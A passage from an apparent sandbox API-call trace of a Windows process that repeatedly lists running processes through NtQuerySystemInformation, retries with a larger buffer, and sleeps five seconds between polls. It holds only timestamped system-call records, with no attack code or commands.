BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.781] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.801] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.816] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.847] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.863] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.878] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.894] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.911] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.925] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.941] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.956] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.987] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.003] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.060] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.065] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.097] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.113] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 